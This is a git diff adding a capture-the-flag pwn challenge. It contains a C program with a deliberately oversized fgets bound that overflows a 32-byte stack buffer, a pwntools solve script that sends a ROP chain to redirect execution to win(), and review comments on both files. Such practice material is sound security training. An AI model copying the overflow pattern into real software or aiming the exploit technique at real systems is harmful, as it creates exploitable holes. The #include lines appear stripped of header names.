diff --git a/pwn/echo_escape_2/flag.txt b/pwn/echo_escape_2/flag.txt
new file mode 100644
index 0000000..7f34d3c
--- /dev/null
+++ b/pwn/echo_escape_2/flag.txt
@@ -0,0 +1 @@
+picoCTF{dummy}
diff --git a/pwn/echo_escape_2/solve.py b/pwn/echo_escape_2/solve.py
new file mode 100755
index 0000000..17034d0
--- /dev/null
+++ b/pwn/echo_escape_2/solve.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "dolphin-cove.picoctf.net 56430".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+    r = conn()
+    r.recvuntil(b'Enter the secret key: ').decode()
+
+    offset = 0x2C
+    rop = ROP(exe)
+    rop.raw(rop.generatePadding(0, offset))
+    rop.win()
+    r.sendline(rop.chain())
+    print(r.recvline_contains(b'picoCTF').decode())
+    r.close()
+
+if __name__ == "__main__":
+    main()
diff --git a/pwn/echo_escape_2/vuln b/pwn/echo_escape_2/vuln
new file mode 100755
index 0000000..63a9450
Binary files /dev/null and b/pwn/echo_escape_2/vuln differ
diff --git a/pwn/echo_escape_2/vuln.c b/pwn/echo_escape_2/vuln.c
new file mode 100644
index 0000000..a559bf9
--- /dev/null
+++ b/pwn/echo_escape_2/vuln.c
@@ -0,0 +1,34 @@
+#include
+#include
+#include
+
+void win() {
+    FILE *fp = fopen("flag.txt", "r");
+    if (!fp) {
+        perror("[!] Could not open flag.txt");
+        exit(1);
+    }
+
+    char flag[128];
+    fgets(flag, sizeof(flag), fp);
+    printf("Flag: %s\n", flag);
+    fflush(stdout);
+    fclose(fp);
+}
+
+void vuln() {
+    char buf[32];
+
+    printf("Enter the secret key: ");
+    fflush(stdout);
+
+    fgets(buf, 128, stdin);
+
+    printf("You entered:, %s\n", buf);
+}
+
+int main() {
+    vuln();
+    puts("Goodbye!");
+    return 0;
+}
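Review bot: `offset = 0x2C` in `main()` of solve.py is a bare magic number with no record of where it came from; a one-line comment tying it to the `char buf[32]` declaration in vuln.c and stating how it was confirmed (`# offset from buf to the saved return address in vuln(); re-derive if the binary is rebuilt`) would let a reader re-check it when the binary changes. The `.decode()` on the discarded `recvuntil` result is dead work, so `r.recvuntil(b'Enter the secret key: ')` alone is enough. `r.close()` is never reached if `recvline_contains` times out on a non-matching response; wrapping the interaction in `try: ... finally: r.close()` keeps the tube from leaking. A comment noting that a local run reads the committed placeholder `flag.txt` (`picoCTF{dummy}`) would also explain the expected output.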
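Review bot: `fgets(buf, 128, stdin)` in `vuln()` passes a bound four times the size of `char buf[32]`, so an input line longer than the buffer writes past it on the stack; the bounded form is `fgets(buf, sizeof(buf), stdin);`, which is the pattern `win()` already uses with `sizeof(flag)`. If the oversized bound is the challenge's intended bug, a comment marking it as deliberate (`/* intentionally oversized bound: this is the challenge's vulnerability */`) would stop a later cleanup from silently removing it. The three `#include` lines carry no header name as rendered, which looks like an extraction artefact rather than the committed text; confirm against the repository. `win()` also ignores a NULL return from `fgets(flag, ...)` and would then print an uninitialized `flag`, and `"You entered:, %s\n"` has a stray comma after the colon.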